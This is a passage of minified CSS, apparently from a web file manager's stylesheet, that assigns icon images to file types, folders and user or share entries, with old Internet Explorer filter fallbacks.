\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none 